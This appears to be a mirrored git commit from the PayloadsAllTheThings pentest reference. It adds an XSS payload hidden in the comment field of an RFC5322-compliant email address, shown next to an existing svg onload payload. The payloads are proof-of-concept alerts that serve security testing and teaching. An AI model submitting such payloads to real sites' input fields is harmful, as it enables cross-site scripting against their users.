mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add additional XSS payload in email addresses RFC5322
This commit is contained in:
parent
b5251a673f
commit
fcf69f8226
@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
|||||||
"><svg/onload=confirm(1)>"@x.y
|
"><svg/onload=confirm(1)>"@x.y
|
||||||
```
|
```
|
||||||
|
|
||||||
|
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
xss@example.com(<img src='x' onerror='alert(document.location)'>)
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass document blacklist
|
### Bypass document blacklist
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
Loading…
Reference in New Issue
Block a user